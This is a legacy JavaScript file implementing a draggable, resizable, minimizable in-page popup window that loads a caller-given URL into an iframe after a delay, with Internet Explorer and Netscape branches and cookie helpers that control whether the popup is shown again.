<!--
// Detect if the browser is IE or not.
// If it is not IE, we assume that the browser is NS.
		
var	window_resize;	
	window_title = "Widnow Popup";
	font_face = "Verdana";
	font_color = "#FFFFFF";
	font_size = "2";
var crossobj;
var frmURL; 		
		
//var IE = document.all?true:false


var MouseD = "False"
var ResizeL = "False"
var iFrmHeight=0;
// Temporary variables to hold mouse x-y pos.s
var temp1X = 0
var temp1Y = 0
var check=0

var restore_top
var restore_left
var restore_width
var restore_height
var wresize
var status = ""
var popup_status
var popup_title
//var dragapproved1
var IE = document.all?true:false
var dragapproved;
// If NS -- that is, !IE -- then set up for mouse capture
if (!IE)
{
	document.captureEvents(Event.MOUSEMOVE)
	document.captureEvents(Event.MOUSEDOWN)
	document.captureEvents(Event.MOUSEUP)
}

// Set-up to use getMouseXY function onMouseMove
//document.onmousemove = getMouseXY;

function goResize()
{
	ResizeL = "True"
}

function getMouseDown()
{
  if (IE)
  {
	if (ResizeL == "True")
	{
		MouseD = "True";
		LayerWidth = parseInt(document.all.showimage.style.width)
		LayerHeight = parseInt(document.all.showimage.style.height)
		if (isNaN(LayerHeight))
		{
			LayerHeight = 0;
		}
		StartX = temp1X
		StartY = temp1Y
	}
  }else
  {
	if (ResizeL == "True")
	{
		MouseD = "True";
		LayerWidth = parseInt(crossobj.style.width)
		LayerHeight = parseInt(crossobj.style.height)
		if (isNaN(LayerHeight))
		{
			LayerHeight = 0;
		}
		StartX = temp1X
		StartY = temp1Y
	}
	if (ns6)
	{
		document.getElementById("myIframe").style.width = (parseInt(document.getElementById("showimage").style.width) - 7)+'px'
		document.getElementById("myIframe").style.height = (parseInt(document.getElementById("showimage").style.height) - 39)+'px'
	}
  }
}

function getMouseUp()
{
	MouseD = "False";
	ResizeL = "False";
	dragapproved=false
	document.onmousemove=getMouseXY
	if (ns6)
	{
		document.getElementById("myIframe").style.width = (parseInt(document.getElementById("showimage").style.width) - 7)+'px'
		document.getElementById("myIframe").style.height = (parseInt(document.getElementById("showimage").style.height) - 39)+'px'
	}
//	stopns()
}

// Main function to retrieve mouse x-y pos.s

function getMouseXY(e)
{
  if (IE)
  { // grab the x-y pos.s if browser is IE
    temp1X = event.clientX + document.body.scrollLeft
    temp1Y = event.clientY + document.body.scrollTop
	if (MouseD == "True")
	{
		EndX = temp1X
		EndY = temp1Y
		lwidth=(LayerWidth + (EndX - StartX))
		lheight=(LayerHeight + (EndY - StartY))
		
		if(lwidth<200) 
			lwidth=200		
		if(lheight<100)
			lheight=100				
		document.all.showimage.style.width = lwidth +'px'
		document.all.showimage.style.height = lheight +'px'
/*				
		document.all.showimage.style.width = (LayerWidth + (EndX - StartX))+'px'
		document.all.showimage.style.height = (LayerHeight + (EndY - StartY))+'px'
*/
		document.all.myIframe.style.height = '100%'
		if (document.getElementById("w_status").innerText != "Done")
		{
			document.getElementById("w_status").innerText = (popup_status.substr(0,parseInt(document.getElementById("showimage").style.width)/7) + "...")
		}
		if (popup_title != "")
		{
				if ((popup_title.length * 10) >= parseInt(document.getElementById("showimage").style.width))
				{
					document.getElementById("dragbar").innerText = (popup_title.substr(0,parseInt(document.getElementById("showimage").style.width)/10) + "...")
				}else
				{
					document.getElementById("dragbar").innerText = popup_title
				}
		}
	}
  } else {  // grab the x-y pos.s if browser is NS
  			
  		temp1X = e.pageX + window.pageXOffset
	    temp1Y = e.pageY + window.pageYOffset
    //temp1X = e.pageX
    //temp1Y = e.pageY
	
	if (MouseD == "True")
	{
		EndX = temp1X
		EndY = temp1Y
		lwidth=(LayerWidth + (EndX - StartX))
		lheight=(LayerHeight + (EndY - StartY))
		
		if(lwidth<200) 
			lwidth=200		
		if(lheight<100)
			lheight=100				
		document.getElementById("showimage").style.width = lwidth +'px'
		document.getElementById("showimage").style.height = lheight +'px'
		if (document.getElementById("w_status").innerHTML != "Done")
		{
			document.getElementById("w_status").innerHTML = (popup_status.substr(0,parseInt(document.getElementById("showimage").style.width)/7) + "...")
		}
		if (popup_title != "")
		{
				if ((popup_title.length * 10) >= parseInt(document.getElementById("showimage").style.width))
				{
					document.getElementById("dragbar").innerHTML = (popup_title.substr(0,parseInt(document.getElementById("showimage").style.width)/10) + "...")
				}else
				{
					document.getElementById("dragbar").innerHTML = popup_title
				}
//			document.getElementById("dragbar").innerHTML = (popup_title.substr(0,parseInt(document.getElementById("showimage").style.width)/10) + "...")
		}
		if (ns6)
		{
			document.getElementById("myIframe").style.width = (parseInt(document.getElementById("showimage").style.width) - 7)+'px'
			document.getElementById("myIframe").style.height = (parseInt(document.getElementById("showimage").style.height) - 39)+'px'
		}
	}
  }  
  // catch possible negative values in NS4
//  if (temp1X < 0){temp1X = 0}
//  if (temp1Y < 0){temp1Y = 0}  
  // show the position values in the form named Show
  // in the text fields named MouseX and MouseY
  return true
}

//-->

var ns4=document.layers
var ie4=document.all
var ns6=document.getElementById&&!document.all

//drag drop function for NS 4////
/////////////////////////////////

var dragswitch=0
var nsx
var nsy
var nstemp
var dragapproved1_g

function drag_dropns(name)
{
if (!ns4)
return
temp=eval(name)
temp.captureEvents(Event.MOUSEDOWN | Event.MOUSEUP)
temp.onmousedown=gons
temp.onmousemove=dragns
temp.onmouseup=stopns
}

function gons(e)
{
temp.captureEvents(Event.MOUSEMOVE)
nsx=e.x
nsy=e.y
}
function dragns(e)
{
if (dragswitch==1){
temp.moveBy(e.x-nsx,e.y-nsy)
return false
}
}

function stopns()
{
	temp.releaseEvents(Event.MOUSEMOVE)
}

//drag drop function for ie4+ and NS6////
/////////////////////////////////


function drag_drop(e){
if (ResizeL == "True")
{
	getMouseXY(event)
	return;
}
//alert(dragapproved)
if (ie4&&dragapproved){
crossobj.style.left=tempx+event.clientX-offsetx
crossobj.style.top=tempy+event.clientY-offsety
if (parseInt(crossobj.style.top) < 0)
{
	crossobj.style.top = 0;
}
if (parseInt(crossobj.style.left) < 0)
{
	crossobj.style.left = 0;
}
return false
}
else if (ns6&&dragapproved){
crossobj.style.left=tempx+e.clientX-offsetx+"px"
crossobj.style.top=tempy+e.clientY-offsety+"px"
return false
}
}

function initializedrag(e){
var firedobj=ns6? e.target : event.srcElement
var topelement=ns6? "html" : document.compatMode!="BackCompat"? "documentElement" : "body"
while (firedobj.tagName!=topelement.toUpperCase() && firedobj.id!="dragbar"){
firedobj=ns6? firedobj.parentNode : firedobj.parentElement
}

if (firedobj.id=="dragbar"){
offsetx=ie4? event.clientX : e.clientX
offsety=ie4? event.clientY : e.clientY

tempx=parseInt(crossobj.style.left)
tempy=parseInt(crossobj.style.top)

if (dragapproved1_g == "true")
{
	dragapproved=true
}
if (ResizeL == "False")
{
	document.onmousemove=drag_drop
}else
{
	//document.onmousedown = getMouseDown
	document.onmousemove=getMouseXY
}

}
}

//document.onmouseup=new Function("dragapproved=false")
document.onmouseup = getMouseUp
document.onmousedown = getMouseDown
document.onmousemove=getMouseXY
//document.onmouseup = getMouseUp;

////drag drop functions end here//////

function hidebox()
{
if (ie4||ns6)
{
crossobj.style.visibility="hidden"
document.getElementById("myIframe").src=''
document.getElementById("showimage").style.top = '0px'
document.getElementById("showimage").style.left = '0px'
document.getElementById("showimage").style.width = '0px'
document.getElementById("showimage").style.height = '0px'
document.getElementById("showimage").style.visibility = 'hidden'

document.getElementById("restore").style.visibility="hidden"
document.getElementById("minimize").style.visibility = 'hidden'
document.getElementById("restoreup").style.visibility = 'hidden'

document.getElementById("resz").style.height = '0px'
document.getElementById("resz_td").style.height = '0px'
document.getElementById("resz_1").style.height = '0px'
document.getElementById("resz_1_td").style.height = '0px'
document.getElementById("resz").style.visibility="hidden"
document.getElementById("image").style.visibility="hidden"
document.getElementById("resz").style.visibility="hidden"
document.getElementById("resz_1_td").style.visibility="hidden"
//document.getElementById("resz").style.visibility="hide"
}
else
{ 
	if (ns4)
	{
		document.showimage.visibility="hide"
		document.restore.visibility = "hide"
	}
}
}
function SetCooKie(name,value)
{
	var argv=SetCooKie.arguments;
	var argc=SetCooKie.arguments.length
	var expires=(argc>2) ? argv[2] : null
	var path=(argc>3) ? argv[3] : null
	var domain=(argc>4) ? argv[4] : null
	var secure=(argc>5) ? argv[5] : false
	document.cookie=name + "=" +escape(value) + 
	((expires==null) ? "" :( ";expires=" + expires.toGMTString())) +
	((path==null) ? "" :( ";path=" + path)) +
	((domain==null) ? "" :( ";domain=" + domain)) +
	((secure==true) ? "; secure " : "")
}

function DeleteCookie (name,path,domain) 
{
	if (GetCookie(name)) {
		document.cookie = name + "=" +
		((path) ? "; path=" + path : "") +
		((domain) ? "; domain=" + domain : "") +
		"; expires=Thu, 01-Jan-70 00:00:01 GMT";
	}
}

/*function GetCookie(name)
{	
	var arg=name + "=" 
	var alen=arg.length
	var clen=document.cookie.length
	var i=0
	while((i<clen) && (i>0))
	{
		var j=i+alen
		if (document.cookie.substring(i,j)==arg)
		{
			//getCookieVal(j)
			return true;
		}
		i=document.cookie.indexOf(" ", i) + i;
		if ( i==0) break;
	}
	return false;
}*/

function GetCookie(name)
{	
	var arg=name + "=" 
	var alen=arg.length
	var clen=document.cookie.length
	var i=0,prev=0;next=0;
	var retval=false;
	while(true)
	{
		next=document.cookie.indexOf("; ", prev);
		if(next<=0)
		{
			var chkval=document.cookie.substring(prev,clen);
			var eqpos=chkval.indexOf("=", 0);
			if(eqpos>0)
			{
				if((chkval.substring(0,eqpos+1))==arg)
				{
					retval=true;
					break;
				}	
			}	
			break;				
		}
		if(next>0)
		{
			var chkval=document.cookie.substring(prev,next);
			var eqpos=chkval.indexOf("=", 0);
			if(eqpos>0)
			{
				if((chkval.substring(0,eqpos+1))==arg)
				{
					retval=true;
					break;
				}	
			}
			
		}
		prev=next+2;	
	}
	return retval;
}


function getCookieVal(offset)
{
	var endstr=document.cookie.indexOf(";",offset)
	if(endstr==-1)
	{
		endstr=document.cookie.length;
	}
	return unescape(document.cookie.substring(offset,endstr));
} 
function DelayShow()
{
	document.getElementById("showimage").style.visibility = 'visible';
/*	if (ie||w3)
        adDiv.visibility="visible";
        else
        adDiv.visibility ="show";
	return;
*/

	document.getElementById("myIframe").src=frmURL
	document.getElementById("w_status").innerText = "Loading "+document.getElementById("myIframe").src
	popup_status = document.getElementById("w_status").innerText
	document.getElementById("w_status").innerText = (popup_status.substr(0,parseInt(document.getElementById("showimage").style.width)/7) + "...")
	document.getElementById("myIframe").style.visibility='visible';	
}

function WindowPopUp(height,width,top,left,windowresize,title,titlebgcolor,titleforecolor,dragapproved1,url,delayTime,showeverytime)
{
crossobj=ns6? document.getElementById("showimage") : document.all.showimage
dragapproved1_g = dragapproved1
check_dapproved = dragapproved1
frmURL=url;
wresize = windowresize

document.getElementById("myIframe").style.scrollbarBaseColor='#FF0000'
//document.getElementById("myIframe").style.scrollbarBaseColor='#FF0000'
//document.getElementById("myIframe").style.changeScrollbarColor='#FF0000'

	var chkshow=false;
	if (!showeverytime)
	{
		chkshow=GetCookie('popalert');
		if (!chkshow)
			SetCooKie('popalert','added')		
	
	}
	else
	{
		DeleteCookie('popalert')
	}
	
	if(!chkshow)
	{
		if (ns4)
		{	
			templayer=document.layers[0]
			templayer.left=left
			templayer.top=top
			templayer.width=width
			templayer.height=height		
		}
		else if (ns6)
		{	
			document.getElementById("showimage").style.height=height
			document.getElementById("showimage").style.width =width
			document.getElementById("showimage").style.left =left
			document.getElementById("showimage").style.top =top				
			//alert(document.getElementById("dragbar").innerTEXT)
			document.getElementById("dragbar").innerHTML=title
			popup_title = document.getElementById("dragbar").innerHTML
			if (popup_title != "")
			{
				if ((popup_title.length * 10) > parseInt(document.getElementById("showimage").style.width))
				document.getElementById("dragbar").innerHTML = (popup_title.substr(0,parseInt(document.getElementById("showimage").style.width)/10) + "...")
			}
			if (titlebgcolor != "")
			{
				document.getElementById("dragbar").style.backgroundColor=titlebgcolor
				document.getElementById("dragbar").style.color = titleforecolor
//				document.getElementById("dragbar").style.width='80%'
				document.getElementById("dragbar1").style.backgroundColor=titlebgcolor
				document.getElementById("dragbar1").style.color = titleforecolor
			}
			
			if (windowresize == "false")
			{
//				document.getElementById("w_status").style.fontSize = '10px'
				document.getElementById("resz_1_td").style.visibility="hidden"
				document.getElementById("image").style.visibility="hidden"
/*				document.getElementById("resz").style.height = '0px'
				document.getElementById("resz_td").style.height = '0px'
			//	alert(document.getElementById("resz_1").style.height)
				document.getElementById("resz_1").style.height = '0px'
				document.getElementById("resz_1_td").style.height = '0px'
				document.getElementById("resz").style.visibility="hide" 
*/
			}
				//alert(url + "  src" + document.getElementById("myIframe").src)
				/*document.getElementById("myIframe").src=url
				document.getElementById("w_status").innerHTML = "Loading "+document.getElementById("myIframe").src
				popup_status = document.getElementById("w_status").innerHTML
				document.getElementById("w_status").innerHTML = (popup_status.substr(0,parseInt(document.getElementById("showimage").style.width)/7) + "...")*/
				
			}
		else
		{	
			document.getElementById("showimage").style.height=height + 'px'
			document.getElementById("showimage").style.width =width + 'px'
			document.getElementById("showimage").style.left =left + 'px'
			document.getElementById("showimage").style.top =top + 'px'
			document.getElementById("dragbar").innerText=title
			popup_title = document.getElementById("dragbar").innerText
			if (popup_title != "")
			{
				if ((popup_title.length * 10) > parseInt(document.getElementById("showimage").style.width))
				document.getElementById("dragbar").innerText = (popup_title.substr(0,parseInt(document.getElementById("showimage").style.width)/10) + "...")
			}
			
			if (titlebgcolor != "")
			{
				document.getElementById("dragbar").style.backgroundColor=titlebgcolor
				document.getElementById("dragbar").style.color = titleforecolor
				document.getElementById("dragbar1").style.backgroundColor=titlebgcolor
				document.getElementById("dragbar1").style.color = titleforecolor
			}
			if (windowresize == "false")
			{
				document.getElementById("resz_1_td").style.visibility="hidden"
				document.getElementById("image").style.visibility="hidden"
/*				document.getElementById("resz").style.height = '0px'
				document.getElementById("resz_td").style.height = '0px'
			//	alert(document.getElementById("resz_1").style.height)
				document.getElementById("resz_1").style.height = '0px'
				document.getElementById("resz_1_td").style.height = '0px'
				document.getElementById("resz").style.visibility="hidden"
*/
			}
		
		//	document.getElementById("table1").style.borderColor=bordercolor
			/*document.getElementById("myIframe").src=url
			document.getElementById("w_status").innerText = "Loading "+document.getElementById("myIframe").src
			popup_status = document.getElementById("w_status").innerText
			document.getElementById("w_status").innerText = (popup_status.substr(0,parseInt(document.getElementById("showimage").style.width)/7) + "...")*/
		}	
/*		if(dragapproved1=="true")	
			dragapproved=true
		else
			dragapproved=false

		//setTimeout("Delaynew()",(sec*1000));	
*/
		setTimeout("DelayShow()",(delayTime*1000));
	}	
}
//WindowPopUp(300,350,100,100,'true','TitleText','White','red','true','testfr.htm')


function at()
{
	if (IE == false)
	{
		document.getElementById("myIframe").height=crossobj.style.height
	}else
	{
		document.getElementById("myIframe").height='100%'
	}
}

function Delaynew()
{
	if (!ns4)
		document.getElementById("showimage").style.visibility="visible";
	else
		document.showimage.visibility="show";
	
	return;
}

function maximize_pop()
{
if (wresize == "true")
{
	document.getElementById("myIframe").style.visibility = 'visible';
	if (IE)
  	{
		if (status != "minimize")
		{
			restore_top = document.all.showimage.style.top
			restore_left = document.all.showimage.style.left
			restore_width = document.all.showimage.style.width
			restore_height = document.all.showimage.style.height
		}else
		{
			document.all.minimize.style.width = '21px'
			document.all.minimize.style.height = '21px'
			document.all.minimize.style.visibility = 'visible'
			
			document.all.restoreup.style.width = '0px'
			document.all.restoreup.style.height = '0px'
			document.all.restoreup.style.visibility = 'hidden'
			
			document.getElementById("resz").style.height = '12px'
			document.getElementById("resz_td").style.height = '12px'
		//	alert(document.getElementById("resz_1").style.height)
			document.getElementById("resz_1").style.height = '12px'
			document.getElementById("resz_1_td").style.height = '12px'
			document.getElementById("w_status").style.fontSize = '10px'
			document.getElementById("resz").style.visibility="visible"
		}
		
		document.all.showimage.style.top = '0px'
		document.all.showimage.style.left = '0px'
		document.all.showimage.style.width =  parseInt(document.body.clientWidth)+'px'
		document.all.showimage.style.height =  parseInt(document.body.clientHeight)+'px'
//		alert(document.all.maximize.src);
//		document.all.maximize.src = 'Mkt001HoverAdrestore.gif'
		document.all.maximize.style.width = '0px'
		document.all.maximize.style.height = '0px'
		
		document.all.restore.style.width = '21px'
		document.all.restore.style.height = '21px'
		document.all.restore.style.visibility = 'visible'
		dragapproved1_g = 'false'

		document.getElementById("w_status").style.fontSize = '10px'
		document.getElementById("resz_1_td").style.visibility="hidden"
		document.getElementById("image").style.visibility="hidden"
		
		if (popup_title != "")
		{
				if ((popup_title.length * 10) >= parseInt(document.getElementById("showimage").style.width))
				{
					document.getElementById("dragbar").innerText = (popup_title.substr(0,parseInt(document.getElementById("showimage").style.width)/10) + "...")
				}else
				{
					document.getElementById("dragbar").innerText = popup_title
				}
//			document.getElementById("dragbar").innerHTML = (popup_title.substr(0,parseInt(document.getElementById("showimage").style.width)/10) + "...")
		}
	}else
	{
		if (status != "minimize")
		{
			restore_top = document.getElementById("showimage").style.top
			restore_left = document.getElementById("showimage").style.left
			restore_width = document.getElementById("showimage").style.width
			restore_height = document.getElementById("showimage").style.height
		}else
		{
			document.getElementById("minimize").style.width = '21px'
			document.getElementById("minimize").style.height = '21px'
			document.getElementById("minimize").style.visibility = 'visible'
			
			document.getElementById("restoreup").style.width = '0px'
			document.getElementById("restoreup").style.height = '0px'
			document.getElementById("restoreup").style.visibility = 'hidden'
			
			document.getElementById("resz").style.height = '12px'
			document.getElementById("resz_td").style.height = '12px'
		//	alert(document.getElementById("resz_1").style.height)
			document.getElementById("resz_1").style.height = '12px'
			document.getElementById("resz_1_td").style.height = '12px'
			document.getElementById("w_status").style.fontSize = '10px'
			document.getElementById("resz").style.visibility="visible"
		}
		document.getElementById("showimage").style.top = '0px'
		document.getElementById("showimage").style.left = '0px'
		document.getElementById("showimage").style.width =  (parseInt(window.innerWidth) - 16)+'px'
		document.getElementById("showimage").style.height =  (parseInt(window.innerHeight) - 37)+'px'
//		alert(document.all.maximize.src);
//		document.all.maximize.src = 'Mkt001HoverAdrestore.gif'
		document.getElementById("maximize").style.width = '0px'
		document.getElementById("maximize").style.height = '0px'
		
		document.getElementById("restore").style.width = '21px'
		document.getElementById("restore").style.height = '21px'
		document.getElementById("restore").style.visibility = 'visible'
		dragapproved1_g = 'false'
		
		document.getElementById("w_status").style.fontSize = '10px'
		document.getElementById("resz_1_td").style.visibility="hidden"
		document.getElementById("image").style.visibility="hidden"
		document.getElementById("myIframe").height=crossobj.style.height
		if (popup_title != "")
		{
				if ((popup_title.length * 10) >= parseInt(document.getElementById("showimage").style.width))
				{
					document.getElementById("dragbar").innerHTML = (popup_title.substr(0,parseInt(document.getElementById("showimage").style.width)/10) + "...")
				}else
				{
					document.getElementById("dragbar").innerHTML = popup_title
				}
//			document.getElementById("dragbar").innerHTML = (popup_title.substr(0,parseInt(document.getElementById("showimage").style.width)/10) + "...")
		}
	}
	if (ns6)
	{
		document.getElementById("myIframe").style.width = (parseInt(document.getElementById("showimage").style.width) - 7)+'px'
		document.getElementById("myIframe").style.height = (parseInt(document.getElementById("showimage").style.height) - 39)+'px'
	}
status = "maximize"
}
}

function restore_pop()
{
	document.getElementById("myIframe").style.visibility = 'visible';
	if(IE)
	{
		document.all.showimage.style.top = restore_top
		document.all.showimage.style.left = restore_left
		document.all.showimage.style.width =  restore_width
		document.all.showimage.style.height =  restore_height
//		alert(document.all.maximize.src);
//		document.all.maximize.src = 'Mkt001HoverAdrestore.gif'
		document.all.maximize.style.width = '21px'
		document.all.maximize.style.height = '21px'
		
		document.all.restore.style.width = '0px'
		document.all.restore.style.height = '0px'
		document.all.restore.style.visibility = 'hidden'
		if (check_dapproved == "true")
			dragapproved1_g = 'true'

		if (wresize == "true")
		{
			document.getElementById("resz_1_td").style.visibility="visible"
			document.getElementById("image").style.visibility="visible"
		}
		if (popup_title != "")
		{
				if ((popup_title.length * 10) >= parseInt(document.getElementById("showimage").style.width))
				{
					document.getElementById("dragbar").innerText = (popup_title.substr(0,parseInt(document.getElementById("showimage").style.width)/10) + "...")
				}else
				{
					document.getElementById("dragbar").innerText = popup_title
				}
//			document.getElementById("dragbar").innerHTML = (popup_title.substr(0,parseInt(document.getElementById("showimage").style.width)/10) + "...")
		}
	}else
	{
		
		document.getElementById("showimage").style.top = restore_top
		document.getElementById("showimage").style.left = restore_left
		document.getElementById("showimage").style.width =  restore_width
		document.getElementById("showimage").style.height =  restore_height
		document.getElementById("myIframe").height=crossobj.style.height
//		alert(document.all.maximize.src);
//		document.all.maximize.src = 'Mkt001HoverAdrestore.gif'
		document.getElementById("maximize").style.width = '21px'
		document.getElementById("maximize").style.height = '21px'
		
		
		document.getElementById("restore").style.width = '0px'
		document.getElementById("restore").style.height = '0px'
		document.getElementById("restore").style.visibility = 'hidden'
		dragapproved1_g = 'true'

		if (wresize == "true")
		{
			document.getElementById("resz").style.height = '12px'
			document.getElementById("resz_td").style.height = '12px'
		//	alert(document.getElementById("resz_1").style.height)
			document.getElementById("resz_1").style.height = '12px'
//			document.getElementById("resz_1_td").style.height = '12px'
			document.getElementById("resz").style.visibility="visible"
			document.getElementById("resz_1_td").style.visibility="visible"
			document.getElementById("image").style.visibility="visible"
		}
		if (popup_title != "")
		{
				if ((popup_title.length * 10) >= parseInt(document.getElementById("showimage").style.width))
				{
					document.getElementById("dragbar").innerHTML = (popup_title.substr(0,parseInt(document.getElementById("showimage").style.width)/10) + "...")
				}else
				{
					document.getElementById("dragbar").innerHTML = popup_title
				}
//			document.getElementById("dragbar").innerHTML = (popup_title.substr(0,parseInt(document.getElementById("showimage").style.width)/10) + "...")
		}
	}
	if (ns6)
	{
		document.getElementById("myIframe").style.width = (parseInt(document.getElementById("showimage").style.width) - 7)+'px'
		document.getElementById("myIframe").style.height = (parseInt(document.getElementById("showimage").style.height) - 39)+'px'
	}
status = "restore"
}

function minimize_pop()
{
	if(IE)
	{
		if (status != "maximize")
		{
			restore_top = document.all.showimage.style.top
			restore_left = document.all.showimage.style.left
			restore_width = document.all.showimage.style.width
			restore_height = document.all.showimage.style.height
		}else
		{
			document.all.maximize.style.width = '21px'
			document.all.maximize.style.height = '21px'
	//		document.all.maximize.style.visibility = 'vsible'
			
			document.all.restore.style.width = '0px'
			document.all.restore.style.height = '0px'
			document.all.restore.style.visibility = 'hidden'
		}

		document.getElementById("resz").style.height = '0px'
		document.getElementById("resz_td").style.height = '0px'
	//	alert(document.getElementById("resz_1").style.height)
		document.getElementById("resz_1").style.height = '0px'
		document.getElementById("resz_1_td").style.height = '0px'
		document.getElementById("w_status").style.fontSize = '0px'
		document.getElementById("resz").style.visibility="hidden"
		document.getElementById("image").style.visibility="hidden"
		
		document.all.showimage.style.width = '200px'
		document.all.showimage.style.height = '20px'
		
		document.all.minimize.style.width = '0px'
		document.all.minimize.style.height = '0px'
		document.all.minimize.style.visibility = 'hidden'
		
		document.all.restoreup.style.width = '21px'
		document.all.restoreup.style.height = '21px'
		document.all.restoreup.style.visibility = 'visible'
		if (popup_title != "")
		{
				if ((popup_title.length * 12) >= parseInt(document.getElementById("showimage").style.width))
				{
					document.getElementById("dragbar").innerText = (popup_title.substr(0,parseInt(document.getElementById("showimage").style.width)/12) + "...")
				}else
				{
					document.getElementById("dragbar").innerText = popup_title
				}
//			document.getElementById("dragbar").innerHTML = (popup_title.substr(0,parseInt(document.getElementById("showimage").style.width)/10) + "...")
		}
	}else
	{
		if (status != "maximize")
		{
			restore_top = document.getElementById("showimage").style.top
			restore_left = document.getElementById("showimage").style.left
			restore_width = document.getElementById("showimage").style.width
			restore_height = document.getElementById("showimage").style.height
		}else
		{
			document.getElementById("maximize").style.width = '21px'
			document.getElementById("maximize").style.height = '21px'
	//		document.all.maximize.style.visibility = 'vsible'
			
			document.getElementById("restore").style.width = '0px'
			document.getElementById("restore").style.height = '0px'
			document.getElementById("restore").style.visibility = 'hidden'
		}
		document.getElementById("image").style.visibility = 'hidden'
		document.getElementById("resz").style.height = '0px'
		document.getElementById("resz_td").style.height = '0px'
	//	alert(document.getElementById("resz_1").style.height)
		document.getElementById("resz_1").style.height = '0px'
		document.getElementById("resz_1_td").style.height = '0px'
		document.getElementById("w_status").style.fontSize = '0px'
		document.getElementById("image").style.visibility="hidden"

		//document.getElementById("resz").style.visibility="hidden"
		
		document.getElementById("showimage").style.width = '260px'
		document.getElementById("showimage").style.height = '0px'
		//alert(crossobj.style.height);
		iFrmHeight=document.getElementById("myIframe").height;
		document.getElementById("myIframe").height='0px';
		document.getElementById("myIframe").style.visibility = 'hidden'
		document.getElementById("minimize").style.width = '0px'
		document.getElementById("minimize").style.height = '0px'
		document.getElementById("minimize").style.visibility = 'hidden'
		
		document.getElementById("restoreup").style.width = '21px'
		document.getElementById("restoreup").style.height = '21px'
		document.getElementById("restoreup").style.visibility = 'visible'

		if (popup_title != "")
		{
				if ((popup_title.length * 10) >= parseInt(document.getElementById("showimage").style.width))
				{
					document.getElementById("dragbar").innerHTML = (popup_title.substr(0,parseInt(document.getElementById("showimage").style.width)/10) + "...")
				}else
				{
					document.getElementById("dragbar").innerHTML = popup_title
				}
//			document.getElementById("dragbar").innerHTML = (popup_title.substr(0,parseInt(document.getElementById("showimage").style.width)/10) + "...")
		}
	}
	if (ns6)
	{
		document.getElementById("myIframe").style.width = (parseInt(document.getElementById("showimage").style.width) - 7)+'px'
		document.getElementById("myIframe").style.height = (parseInt(document.getElementById("showimage").style.height) - 39)+'px'
	}
	document.getElementById("myIframe").style.visibility = 'hidden';
status = "minimize"
}

function restoreup_pop()
{
	document.getElementById("myIframe").style.visibility = 'visible';
	if(IE)
	{
		document.all.showimage.style.width =  restore_width
		document.all.showimage.style.height =  restore_height
//		alert(document.all.maximize.src);
//		document.all.maximize.src = 'Mkt001HoverAdrestore.gif'
		document.all.minimize.style.width = '21px'
		document.all.minimize.style.height = '21px'
		document.all.minimize.style.visibility = 'visible'
		
		document.all.restoreup.style.width = '0px'
		document.all.restoreup.style.height = '0px'
		document.all.restoreup.style.visibility = 'hidden'
		if (check_dapproved == "true")
			dragapproved1_g = 'true'

		document.getElementById("resz").style.height = '12px'
		document.getElementById("resz_td").style.height = '12px'
	//	alert(document.getElementById("resz_1").style.height)
		document.getElementById("resz_1").style.height = '12px'
		document.getElementById("resz_1_td").style.height = '12px'
		document.getElementById("w_status").style.fontSize = '10px'
		document.getElementById("resz").style.visibility="visible"
		
		if (wresize == "false")
		{
			document.getElementById("resz_1_td").style.visibility="hidden"
			document.getElementById("image").style.visibility="hidden"
		}else
		{
			document.getElementById("resz_1_td").style.visibility="visible"
			document.getElementById("image").style.visibility="visible"
		}
		if (popup_title != "")
		{
				if ((popup_title.length * 10) >= parseInt(document.getElementById("showimage").style.width))
				{
					document.getElementById("dragbar").innerText = (popup_title.substr(0,parseInt(document.getElementById("showimage").style.width)/10) + "...")
				}else
				{
					document.getElementById("dragbar").innerText = popup_title
				}
//			document.getElementById("dragbar").innerHTML = (popup_title.substr(0,parseInt(document.getElementById("showimage").style.width)/10) + "...")
		}
	}else
	{
		document.getElementById("image").style.visibility = 'visible'
		document.getElementById("showimage").style.width =  restore_width
		document.getElementById("showimage").style.height =  restore_height
		document.getElementById("myIframe").style.visibility = 'visible'
//		alert(document.all.maximize.src);
//		document.all.maximize.src = 'Mkt001HoverAdrestore.gif'
		document.getElementById("minimize").style.width = '21px'
		document.getElementById("minimize").style.height = '21px'
		document.getElementById("minimize").style.visibility = 'visible'
		document.getElementById("myIframe").height=iFrmHeight;
		document.getElementById("restoreup").style.width = '0px'
		document.getElementById("restoreup").style.height = '0px'
		document.getElementById("restoreup").style.visibility = 'hidden'
		dragapproved1_g = 'true'

		document.getElementById("resz").style.height = '12px'
		document.getElementById("resz_td").style.height = '12px'
	//	alert(document.getElementById("resz_1").style.height)
		document.getElementById("resz_1").style.height = '12px'
		document.getElementById("resz_1_td").style.height = '12px'
		document.getElementById("w_status").style.fontSize = '10px'
		document.getElementById("resz").style.visibility="visible"
		
		if (wresize == "false")
		{
			document.getElementById("resz_1_td").style.visibility="hidden"
			document.getElementById("image").style.visibility="hidden"
		}else
		{
			document.getElementById("resz_1_td").style.visibility="visible"
			document.getElementById("image").style.visibility="visible"
		}
		if (popup_title != "")
		{
				if ((popup_title.length * 10) >= parseInt(document.getElementById("showimage").style.width))
				{
					document.getElementById("dragbar").innerHTML = (popup_title.substr(0,parseInt(document.getElementById("showimage").style.width)/10) + "...")
				}else
				{
					document.getElementById("dragbar").innerHTML = popup_title
				}
//			document.getElementById("dragbar").innerHTML = (popup_title.substr(0,parseInt(document.getElementById("showimage").style.width)/10) + "...")
		}
	}
	if (ns6)
	{
		document.getElementById("myIframe").style.width = (parseInt(document.getElementById("showimage").style.width) - 7)+'px'
		document.getElementById("myIframe").style.height = (parseInt(document.getElementById("showimage").style.height) - 39)+'px'
	}
status = "restoreup"
}
function setthisFrame()
{
//alert("called");
//alert(document.getElementById("showimage").style.width);
	document.getElementById("iframeTD").style.fontSize = '0px';
	document.getElementById("iframeTD").style.visibility = 'hidden';
	document.getElementById("myIframe").style.left = '4px';
	document.getElementById("myIframe").style.top = '32px';
	if (document.getElementById("myIframe").src != '')
	{
		document.getElementById("myIframe").style.visibility = 'visible';
	}else
	{
		document.getElementById("myIframe").style.visibility = 'hidden';
	}
	if (ns6)
	{
		document.getElementById("myIframe").style.width=(parseInt(document.getElementById("showimage").style.width) - 7)+'px'
		document.getElementById("myIframe").style.height=(parseInt(document.getElementById("showimage").style.height) - 39)+'px'
		document.getElementById("w_status").innerHTML = "Done"
	}else
	{
		document.getElementById("w_status").innerText = "Done"
	}
	if (wresize == "true")
	{
		if (IE)
		{
			document.all.image.style.visibility="visible"
		}else
		{
			document.getElementById("image").style.visibility="visible"
		}
	}
}
function chk()
{
	if (ResizeL == "True")
	{
		getMouseUp();
	}else
	{
		dragapproved=false
	}
}

